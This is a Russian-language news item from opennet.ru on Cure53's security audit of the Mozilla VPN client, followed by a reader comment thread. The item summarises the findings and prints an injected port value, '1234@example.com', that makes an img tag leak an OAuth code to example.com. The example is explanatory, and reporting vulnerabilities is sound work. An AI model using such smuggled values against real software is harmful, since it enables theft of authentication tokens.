Опубликованы результаты аудита VPN-клиента Mozilla

03.09.2021 10:07

Компания Mozilla объявила о завершении независимого аудита клиентского ПО для подключения к сервису Mozilla VPN. В ходе аудита был выполнен анализ обособленного клиентского приложения, написанного с использованием библиотеки Qt и поставляемого для Linux, macOS, Windows, Android и iOS. Работу Mozilla VPN обеспечивает более 400 серверов шведского VPN-провайдера Mullvad, размещённых в более чем 30 странах. Подключение к VPN-сервису производится при помощи протокола WireGuard.

Аудит выполнен компанией Cure53, в своё время проводившей аудит проектов NTPsec, SecureDrop, Cryptocat, F-Droid и Dovecot. Аудит затрагивал проверку исходных текстов и включал проведение тестов для выявления возможных уязвимостей (вопросы, связанные с криптографией не рассматривались). В ходе проверки выявлено 16 проблем с безопасностью, 8 из которых имели характер рекомендаций, 5 присвоен низкий уровень опасности, двум - средний, а одной - высокий.

При этом лишь одна проблема со средним уровнем опасности была отнесена к категории уязвимостей, так как только она была пригодна для эксплуатации. Указанная проблема приводила к утечке сведений о применений VPN в коде для определения captive portal из-за отправки незашифрованных прямых запросов по HTTP, передаваемых вне VPN-туннеля и раскрывающих основной IP-адрес пользователя в случае если атакующий может контролировать транзитный трафик. Проблема решается отключением режима определения captive portal в настройках.

Вторая проблема среднего уровня опасности связана с отсутствием должной чистки нечисловых значений в номере порта, что позволяет организовать утечку параметров аудентификации OAuth через подмену номера порта на строку вида "1234@example.com", что приведёт к установке тега <img src="http://127.0.0.1:1234@example.com/?code=..." alt="">, обращающегося к example.com вместо 127.0.0.1.

Третья проблема, помеченная как опасная, позволяет любому локальному приложению без аутентификации обратиться к VPN-клиенту через WebSocket, привязанный к localhost. В качестве примера показано, как при активном VPN-клиенте любой сайт мог организовать создание и отправку скриншота через генерацию события screen_capture. Проблема не отнесена к категории уязвимостей, так как WebSocket использовался только во внутренних тестовых сборках и применение данного канала связи лишь планировалось в будущем для организации взаимодействия с браузерным дополнением.

исправить +25 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/55730-vpn

Ключевые слова: vpn, mozilla

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (86)

1.1, Аноним (1), 10:15, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	–8 +/–
Лучшая — лучшая организация в мире! Как бы я хотел там работать, но я туповат для этого.

2.9, большинство (?), 10:39, 03/09/2021 [^] [^^] [^^^] [ответить]	+25 +/–
Укажи в резюме, что сочувствуешь меньшинствам.

3.38, Аноним (38), 13:23, 03/09/2021 [^] [^^] [^^^] [ответить]	+12 +/–
"Отношусь к интеллектуальнму меньшинству" и все, не смогут не взять!

4.43, Аноним (43), 13:44, 03/09/2021 [^] [^^] [^^^] [ответить]	+2 +/–
А если начнут устраивать сегрегацию по интеллектуальному признаку засудить нафиг.

4.97, Аноним (-), 05:08, 04/09/2021 [^] [^^] [^^^] [ответить]	+3 +/–
> "Отношусь к интеллектуальнму меньшинству" и все, не смогут не взять! Если интеллекта не хватает - таки, увы, не к меньшинству. FAIL!

2.14, КО (?), 10:53, 03/09/2021 [^] [^^] [^^^] [ответить]	–1 +/–
Что-то Speech-to-text у данной организации до сих пор не готов. Даже элементарный переводчик до сих пор дорабатывают.

3.61, Аноним (61), 14:57, 03/09/2021 [^] [^^] [^^^] [ответить]	–5 +/–
это раст

4.86, Enamel (ok), 17:32, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
при чем тут раст?

2.16, Аноним (16), 11:02, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Ах если бы... Мозилка в последнее время коллективно поехала кукухой и топит за цензуру.

3.82, Аноним (-), 16:29, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Пруфца бы...

4.103, Пикапика (?), 18:37, 04/09/2021 [^] [^^] [^^^] [ответить]	+/–
https://blog.mozilla.org/en/mozilla/we-need-more-than-deplatforming/

2.36, Аноним (36), 13:16, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Cure53?

2.60, Аноним (61), 14:54, 03/09/2021 [^] [^^] [^^^] [ответить]	–3 +/–
> Лучшая — лучшая организация в мире! Как бы я хотел там работать, но я туповат для этого. Т.е. ты хотел бы прислуживать и быть на побегушках у обезьянок? Или ты сам оно?

2.105, Аноним (-), 19:49, 05/09/2021 [^] [^^] [^^^] [ответить]	+/–
Чувак, не парься. Я, вот, например, тоже туповат чтобы меня взяли во всякие мозиллы, гуглы, микрософты. Но я достаточно умён чтобы не пытаться туда устраиваться. В отличие от уже туда устроившихся. Вы только посмотрите какое г-но они в итоге производят. Занюхаешься! Ням-ням. Мухи-мухи.

1.2, Аноним (2), 10:21, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	–5 +/–
Так а смысл, если сам по себе WireGuard отстреливается на ура?

2.44, OpenEcho (?), 13:49, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Пруффс плыз

3.48, Аноним (-), 14:14, 03/09/2021 [^] [^^] [^^^] [ответить]	–3 +/–
В моей сети, например, открыт только TCP 443. WireGuard через него не работает.

4.59, OpenEcho (?), 14:47, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
> В моей сети, например, открыт только TCP 443. WireGuard через него не > работает. Под термином "отстреливается на ура" обычно понимается - "стукачит" или "home calling"

4.85, mumu (ok), 17:28, 03/09/2021 [^] [^^] [^^^] [ответить]	–2 +/–
https://letmegooglethat.com/?q=how+to+change+default+wireguard+port Не благодари

3.55, Аноним (2), 14:39, 03/09/2021 [^] [^^] [^^^] [ответить]	–1 +/–
А что, вас уже не только VPN, но и в уточке/гугле/яндыхе/мёртвом рамблере забанили? Ну вот, например, баян https://habr.com/ru/post/415977/ с тех пор радикально вроде ничего не менялось

4.68, OpenEcho (?), 15:14, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Повторюсь Под термином отстреливается на ура обычно понимается - стукачит ... большой текст свёрнут, показать

5.72, Аноним (2), 15:52, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Отстреливается значит убивается. А ваши дополнительные хотелки - это уже конкретные имплементации, дыры и закладочки в конкретных продуктах. Про непобедимость OpenVPN - влажные мечты)

6.75, OpenEcho (?), 16:10, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
> Про непобедимость OpenVPN - влажные мечты) Да я вроде как и не говорил про "непобедимость OpenVPN", т.к. приходится часто работать на "два-фронта" ;)

5.98, Аноним (-), 05:09, 04/09/2021 [^] [^^] [^^^] [ответить]	+/–
Да вон на гитхабе кто-то уже накорябал модуль трансформации трафика.

1.3, iPony129412 (?), 10:24, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Жаль всё ограниченно по территории сильно. А так заканчивается подписка на protonVPN - жду их ❤🦊

2.12, Аноним (12), 10:46, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
А как же 🐎VPN? Всем поням премиум-аккаунт бесплатно!

2.62, Аноним (61), 14:58, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Потому что ты живешь в устарелой стране

3.81, Аноним (-), 16:27, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Рaбы должны страдать...

1.4, Аноним (4), 10:24, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Когда будут опубликованы результаты аудита аудитора? И аудита аудитора аудитора?

2.5, Sergey (??), 10:28, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Зачем так сложно ? Ведь написано Мозилла объявила ...

2.17, Аноним (17), 11:02, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
> Когда будут опубликованы результаты аудита аудитора с помощью PVS Studio? пофиксил

2.33, Аноним (33), 12:21, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
>Когда будут опубликованы результаты аудита аудитора Когда будут опубликованы результаты проверки аудитора на соответствие требованиям для допуска к гостайне.

2.79, Аноним (79), 16:25, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Публикую. Результат хороший!

1.6, ixrws (??), 10:32, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
И с каких пор такой аудит считается показателем чего либо? Там работают люди, даже если они свою работу сделали хорошо(а откуда мы знаем?), то они всего лишь люди и могли не заметить массу всего. Какой-то странный мир стал, люди доверяют каким-то заявлениям просто потому, что одно громкое имя сделало подпись под заявлением. Ну так таким макаром можно доверять и Гитлеру, там громких имён с подписями было достаточно и аудиты разного рода они тоже проводили.

2.7, Enamel (ok), 10:35, 03/09/2021 [^] [^^] [^^^] [ответить]	+2 +/–
По такой логике нужно срочно отключиться от интернета, выкинуть всю технику и уйти в лес

3.73, Аноньимъ (ok), 15:58, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Это довольно разумная стратегия в современном мире на самом деле. Сильно повысит ваши шансы на выживание.

4.87, Корпоративный_сисадмин (?), 17:44, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Занятное утверждение. Боюсь только, большинство тутошнего контингента ничего тяжелее мышки в руках не держало, а потому долго в лесу не протянут даже при наличии пропитания (что под большим вопросом) и жилья...

5.88, Аноньимъ (ok), 18:11, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Это верно конечно. Но и в квартире с заваренной дверью без еды как-то то-же долго не протянешь. Не говоря уже если скажем исчезнет электричество отопление и вода. В дикой природе у мышковоза будет хотя-бы маленький шанс. Говорят более разумной тактикой будет выживание в городе, именно городе, а не мегаполисе, или деревне. Но хижина в лесу то-же неплохая идея.

3.99, При (?), 07:58, 04/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
При сталине за уход в лес отправляли в лагеря или расстреливали

2.11, Нанобот (ok), 10:43, 03/09/2021 [^] [^^] [^^^] [ответить]	+3 +/–
Наличие аудита лучше отсутствия аудита.

2.24, Аноним (24), 11:18, 03/09/2021 [^] [^^] [^^^] [ответить]	+4 +/–
> Ну так таким макаром можно доверять и Гитлеру Иногда думаешь, что комментаторы с Опеннета уже ничем тебя не удивят, но раз за разом оказываешься неправ.

2.39, Alex (??), 13:24, 03/09/2021 [^] [^^] [^^^] [ответить]	–1 +/–
Так Гитлеру и доверял весь западный мир. Пока он бомбить не начал теми кто доверял ему больше.

3.56, Аноним (2), 14:41, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Теми? Офигительная история

4.78, Аноним (78), 16:23, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Поколение ЕГЭ, **ли!

3.100, Особенно (?), 08:00, 04/09/2021 [^] [^^] [^^^] [ответить]	+/–
Особенно великобритания и сша

1.8, Аноним (8), 10:37, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> вопросы, связанные с криптографией не рассматривались Кстати, почему?

2.10, Аноним (10), 10:42, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
На аудите криптографии и кода специализируются разные конторы. Там протокол WireGuard, внешний аудит которого, насколько я могу судить, пока ещё никто не проводил.

3.13, хм (?), 10:52, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Так он же формально верифицирован.

3.45, OpenEcho (?), 13:54, 03/09/2021 [^] [^^] [^^^] [ответить]

+2 +/–

> Там протокол WireGuard, внешний аудит которого, насколько я могу судить, пока ещё никто не проводил.

Анализ от MIT подойдет судье?

https://courses.csail.mit.edu/6.857/2018/project/He-Xu-Xu-WireGuard.pdf

2.20, Аноним (16), 11:06, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Потому что это не софт мозиллы. Плюс, мозилла на самом деле не заведует VPN-сервисом -- они перепродают Mullvad. А вот те ребята уже упарываются по верификации всего и вся. Почитай про их проект System Transparency, в рамках которого они пытаются гарантировать, что их vpn-cерверы крутят именно тот софт, который заявлен. Весьма крутая штука.

3.30, Аноним (30), 12:12, 03/09/2021 [^] [^^] [^^^] [ответить]	–2 +/–
Весьма крутая штука на словах. Не забываем из какой страны ложное обвинение Ассанжа пришло.

4.37, Аноним (37), 13:18, 03/09/2021 [^] [^^] [^^^] [ответить]	+2 +/–
Так же не забываем, в какой стране появился The Pirate Bay. Я думаю, он один перекрывает десяток поехавших феминисток.

1.15, Аноним (15), 10:59, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	+5 +/–
Все так же доверять можно лишь ProtonVPN.

2.23, iPony129412 (?), 11:17, 03/09/2021 [^] [^^] [^^^] [ответить]	–7 +/–
Это когда они в открытую врали с самолётом? ✈

3.29, Аноним (15), 12:12, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
А что там было с самолетом?

4.34, iPony129412 (?), 12:43, 03/09/2021 [^] [^^] [^^^] [ответить]	–7 +/–
> А что там было с самолетом? https://www.reuters.com/world/europe/email-bomb-threat-sent-after-bloggers-pla

5.40, Аноним (15), 13:29, 03/09/2021 [^] [^^] [^^^] [ответить]	–7 +/–
Спасибо, теперь я их презираю. Где лучше почту завести?

6.50, Аноним (-), 14:17, 03/09/2021 [^] [^^] [^^^] [ответить]	–3 +/–
Рамблер/почта

7.54, Аноним (15), 14:38, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
Они ведь полностью под контролем ФСБ поэтому не подходят.

8.66, Аноним (66), 15:04, 03/09/2021 [^] [^^] [^^^] [ответить]	–1 +/–
Пользуйся PGP и VPN ... текст свёрнут, показать

6.71, Массоны Рептилоиды (?), 15:45, 03/09/2021 Скрыто ботом-модератором [к модератору]	+/–

6.83, Аноним (-), 16:30, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Мейлру конечно.

5.49, Аноним (-), 14:16, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
>Access Denied

3.32, Аноним (32), 12:16, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Ну доверяют же "безопасному" Телеграмму. А там враньё на вранье и враньем погоняет.

4.94, Аноним (-), 23:15, 03/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
давай прувы, трепло

5.101, Аноним (32), 11:07, 04/09/2021 [^] [^^] [^^^] [ответить]	+/–
Единственный который ты мог бы осилить самого начала - привязка юзера к номеру его телефона. Но ты не осилил. Так что разговор с тобой бессмыслен.

3.57, Аноним (2), 14:46, 03/09/2021 [^] [^^] [^^^] [ответить]	+2 +/–
А что именно из этого врали? Письмо сами себе отправили после собственного терракта? Ну так какая разница откуда его отправили, ещё и с такой "беспаливной" формулировкой как была опубликована.

4.89, Корпоративный_сисадмин (?), 20:50, 03/09/2021 [^] [^^] [^^^] [ответить]	–1 +/–
Полагаю, речь была о том, что ушлые ребятки из ProtonMail сами таки читают твою почту (хоть и мешают делать это другим) и делятся прочитанным с органами. Приватная такая приватность.

5.96, Аноним (96), 02:33, 04/09/2021 [^] [^^] [^^^] [ответить]	+1 +/–
> читают твою почту Ну ну.

6.106, Аноним (-), 19:55, 05/09/2021 [^] [^^] [^^^] [ответить]	+/–
Да-да

3.63, Аноним (61), 15:02, 03/09/2021 [^] [^^] [^^^] [ответить]

+/–

Твоя информация безбожно устарела. Твой поиск адекватной информации тоже.

Ты как та бабка в синих кедах и такую же информацию собираешь. С самолётом уже всё давно не так. А эти твои ссылки такой же бред как и каждый твой комментарий.

Прогнивший на сквозь ненавистью к самому себе бедный больной поняш.

4.70, Аноним (15), 15:36, 03/09/2021 [^] [^^] [^^^] [ответить]	–2 +/–
Не обижай поней, понефоб. Мне тебя жалко.

2.46, OpenEcho (?), 14:02, 03/09/2021 [^] [^^] [^^^] [ответить]

+/–

> Все так же доверять можно лишь ProtonVPN.

Доверять можно только купленному
VPS за бугром с установленным VPN-om, который соединен к другому
VPS за бугром с установленным VPN-om, который соединен к другому
VPS за бугром с установленным VPN-om, который соединен к другому
...
...
...
VPS за бугром с установленным VPN-om, который соединен к другому,
который в свою очередь использует купленные на черном рунке зараженные зомби, проксировав через которые надо чейнить к цепочке
VPS за бугром с установленным VPN-om, который соединен к другому
VPS за бугром с установленным VPN-om, который соединен к другому
...
VPS за бугром с установленным VPN-om, который соединен к другому

Но презик на всякий случай все равно лучше иметь, т.к. фингерпринт браузера обнулит всю эту хитропопость

3.52, Аноним (-), 14:24, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Доверяю Tor Browser через 2 VPN.

4.58, Аноним (2), 14:47, 03/09/2021 [^] [^^] [^^^] [ответить]	–2 +/–
а пока ты ему доверяешь, твой реальный адрес течёт напрямую из дырявого браузера

5.69, Аноним (69), 15:34, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
И какой же он?

6.84, Аноним (84), 17:23, 03/09/2021 [^] [^^] [^^^] [ответить]	+2 +/–
127.0.0.1

3.74, Led (ok), 15:59, 03/09/2021 [^] [^^] [^^^] [ответить]	+6 +/–
>Но презик на всякий случай все равно лучше иметь >обнулит Так у вас же и так есть обнулённый презик?

4.76, OpenEcho (?), 16:13, 03/09/2021 [^] [^^] [^^^] [ответить]	–1 +/–
> Так у вас же и так есть обнулённый презик? Та ну нафиг, мы только rfc1149 юзаем

1.18, Аноним (18), 11:04, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	–4 +/–
У нас 6 впн сервисов сейчас заблокировали и этот если надо ляжет. Вообще конечно продолжайте делать ставки на спорт и верить в криптомани. Лох не мамонт - лох не вымрет С.Мавроди (с)

1.22, Moomintroll (ok), 11:11, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
"обособленного" - это "proprietary"? В данном контексте, по-моему, неудачный перевод.

2.51, Аноним (10), 14:18, 03/09/2021 [^] [^^] [^^^] [ответить]	+/–
Видимо имелось в виду отдельное приложение, а не дополнение к браузеру.

1.53, Аноним (61), 14:27, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Развели заопарк в этой мозиле. Gtk, rust, Qt. Выбрасывайте всё это и идите на Qt полнсотью. Может тода им пользоваться можно будет. А то таки единственный вменяемый браузер какраз на Qt. Вернее их 2

1.67, Аноним (61), 15:12, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]

–1 +/–

> аудентификации OAuth через подмену номера порта на строку вида "1234@example.com", что приведёт к установке тега <img src="http://127.0.0.1:1234@example.com/?code=..." alt="">, обращающегося к example.com вместо 127.0.0.1.

аудентификации, OAuth, тэги

всё что нужно знать о мартышках и в том числе мартышках в мозиле

1.102, Аноним (102), 15:27, 04/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Популярность Firefox падает судя по статистике

1.104, YetAnotherOnanym (ok), 23:10, 04/09/2021 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> captive portal За эту гадость могиловцам следовало поотбивать руки когда оно только появилось.

игнорирование участников | лог модерирования

Добавить комментарий

Текст: